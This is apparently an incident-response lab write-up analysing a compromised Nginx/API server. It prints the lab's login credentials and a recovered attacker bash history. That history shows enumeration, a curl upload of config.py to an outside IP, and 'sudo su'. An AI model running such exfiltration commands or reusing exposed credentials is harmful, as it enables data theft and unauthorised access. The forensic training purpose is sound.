IR LAB

Objective: Analyze the access logs of a compromised Nginx web server. Can you correctly identify the method of enumeration and initial exploitation by the attacker?

Scenario

"This is our third breach for this year: we see strange web requests in Nginx logs, then some unexpected changes in system files, and after a few days, we see our data in Telegram! We tried cleaning infected files, but hackers are always one step forward.”

“Yesterday, we observed a similar web scan on our newly deployed API server, and suspect it might be the same threat actors. We quickly isolated the server from the network and desperately hope for your help!”

<aside> 💡 Creds

• IP Address: 10.10.187.98
• Username: dev
• Password: d3v-p455w0rd </aside>

Key Findings:

Initial Access

Artifact #1: Bash History

id
id
uname -a
ls -la /etc
ls -la
cd apiservice/
ls
cat main.py 
cd src/
ls
cat api.py 
cat config.py 
curl --upload-file config.py <http://5.230.66.147/me7d6bd4beh4ura8/upload>
exit
sudo su
clear

• The API was configured with Python
• Adversary uploaded the config.py to a possible C2 server
• They also elevated their privs from the dev account(full sudo permissions)

config.py(dev’s creds were not updated)

dev@prod-web-003:~/apiservice/src$ cat config.py
class config:
    API_HOST = "0.0.0.0"
    API_PORT = 8081

    # TODO: Implement some authentication
    # API_USER = "dev"
    # API_PASS = "d3v-p455w0rd"